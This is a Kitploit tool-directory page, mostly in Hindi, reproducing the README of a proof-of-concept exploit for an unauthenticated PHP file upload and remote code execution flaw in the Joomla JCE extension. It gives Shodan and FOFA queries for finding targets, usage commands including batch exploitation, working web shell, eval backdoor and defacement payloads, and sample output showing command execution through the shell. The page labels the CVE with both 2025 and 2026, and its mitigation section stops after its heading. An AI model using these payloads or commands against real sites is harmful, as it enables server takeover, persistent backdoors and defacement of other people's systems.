Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48907 — CVE-2025-48907 - अप्रमाणित RCE शोषण Joomla JCE < 2.9.99.5 के लिए | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - अप्रमाणित RCE शोषण Joomla JCE < 2.9.99.5 के लिए

रिपॉजिटरी देखें
41623 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
Joomla Logo

CVE-2026-48907 - Joomla! JCE अप्रमाणित RCE

Joomla! JCE एक्सटेंशन < 2.9.99.5 - अप्रमाणित मनमाना PHP फ़ाइल अपलोड और रिमोट कोड निष्पादन

License: MIT Python 3.6+ Security Shodan FOFA


🔎 खोज इंजन क्वेरी

Shodan

http.component:"Joomla"

FOFA

app="Joomla"

📋 अवलोकन

इस रिपॉजिटरी में CVE-2026-48907 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो 2.9.99.5 से पहले के Joomla! JCE (Joomla Content Editor) एक्सटेंशन संस्करणों में एक गंभीर भेद्यता है। यह भेद्यता अप्रमाणित हमलावरों को JCE प्रोफ़ाइल आयात कार्यक्षमता के माध्यम से मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देती है, जिससे रिमोट कोड निष्पादन (RCE) होता है।

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है
  • लेखक किसी भी दुरुपयोग या अवैध गतिविधियों के लिए जिम्मेदार नहीं है
  • परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें

🔍 भेद्यता विवरण

गुणमान
CVE आईडीCVE-2026-48907
उत्पादJoomla! JCE Extension
प्रभावित संस्करण< 2.9.99.5
भेद्यता प्रकारअप्रमाणित PHP फ़ाइल अपलोड → RCE
CVSS स्कोर9.8 (गंभीर)
हमला वेक्टरनेटवर्क
प्रमाणीकरणकोई आवश्यक नहीं
प्रभावपूर्ण सिस्टम समझौता

यह कैसे काम करता है

  1. CSRF टोकन निकालना: एक्सप्लॉइट पहले लक्ष्य के होमपेज से CSRF टोकन निकालता है
  2. प्रोफ़ाइल आयात का दुरुपयोग: यह JCE प्रोफ़ाइल आयात कार्यक्षमता का लाभ उठाता है (index.php?option=com_jce&task=profiles.import)
  3. PHP फ़ाइल अपलोड: एक प्रोफ़ाइल XML फ़ाइल के रूप में छिपी एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड करता है
  4. कोड निष्पादन: अपलोड की गई PHP फ़ाइल /tmp/ निर्देशिका में रखी जाती है और सीधे पहुँच के माध्यम से निष्पादित की जा सकती है

🚀 विशेषताएँ

  • ✅ कोई भी PHP फ़ाइल अपलोड करें: कस्टम PHP शेल, बैकडोर या विकृति पृष्ठ (PHP-आधारित) अपलोड करें
  • ✅ बैच प्रोसेसिंग: एक फ़ाइल से कई लक्ष्यों को स्कैन और शोषण करें
  • ✅ CSRF टोकन स्वतः-पता लगाना: स्वचालित रूप से CSRF टोकन निकालता है
  • ✅ वर्बोज़ मोड: डिबगिंग के लिए विस्तृत आउटपुट
  • ✅ परिणाम निर्यात: सफल अपलोड URL को एक फ़ाइल में सहेजें

📦 स्थापना

# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Install required dependencies
pip3 install requests urllib3

आवश्यकताएँ

  • Python 3.6 या इससे उच्च
  • requests लाइब्रेरी
  • urllib3 लाइब्रेरी

🎯 उपयोग

मूल सिंटैक्स

python3 CVE-2025-48907.py -u <TARGET_URL> -F <PHP_FILE_TO_UPLOAD>

उदाहरण

PHP वेब शेल अपलोड करें

python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

PHP विकृति पृष्ठ अपलोड करें

python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

PHP बैकडोर अपलोड करें

python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

लक्ष्य फ़ाइल के साथ बैच शोषण

python3 CVE-2025-48907.py -f targets.txt -F payload.php

वर्बोज़ आउटपुट और परिणाम सहेजने के साथ

python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

कमांड लाइन तर्क

तर्कआवश्यकविवरण
-u, --urlहाँ*एकल लक्ष्य URL (जैसे, http://target.com)
-f, --fileहाँ*लक्ष्य URL की सूची वाली फ़ाइल (प्रति पंक्ति एक)
-F, --upload-fileहाँअपलोड करने के लिए PHP फ़ाइल (शेल, बैकडोर, विकृति पृष्ठ)
-v, --verboseनहींडिबगिंग के लिए वर्बोज़ आउटपुट सक्षम करें
-o, --outputनहींसफल अपलोड URL को फ़ाइल में सहेजें

* या तो -u या -f प्रदान किया जाना चाहिए

लक्ष्य फ़ाइल प्रारूप

प्रति पंक्ति एक URL के साथ एक targets.txt फ़ाइल बनाएँ:

http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comments are ignored
https://example-joomla.com

🔧 PHP पेलोड बनाना

सभी पेलोड PHP फ़ाइलें होनी चाहिए क्योंकि एक्सप्लॉइट PHP कोड अपलोड करता है जो सर्वर पर निष्पादित होगा।

PHP वेब शेल

shell.php बनाएँ:

<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Usage: ?cmd=command";
}
?>

PHP विकृति पृष्ठ

deface.php बनाएँ:

<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hacked by 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKED BY 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Security is not a product, it\'s a process.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

PHP बैकडोर (न्यूनतम)

backdoor.php बनाएँ:

<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 आउटपुट उदाहरण

_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE
Author : 0xgh057r3c0n (PHP File Upload)

[*] Loaded 3 target(s)

[*] Target 1/3
[*] ==================================================
[+] Target: http://target-joomla.com
[+] Fetching CSRF token...
[+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Uploading PHP file: cve-2026-48907-1234.xml.php
[+] Profile imported successfully!
[+] Testing uploaded PHP file...

============================================================
[!!!!!] PHP FILE UPLOADED SUCCESSFULLY!
[!!!!!] Server IS VULNERABLE to CVE-2025-48907!
============================================================

[+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Quick access:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ पता लगाना और शमन

कैसे पता करें

टूल डाउनलोड करें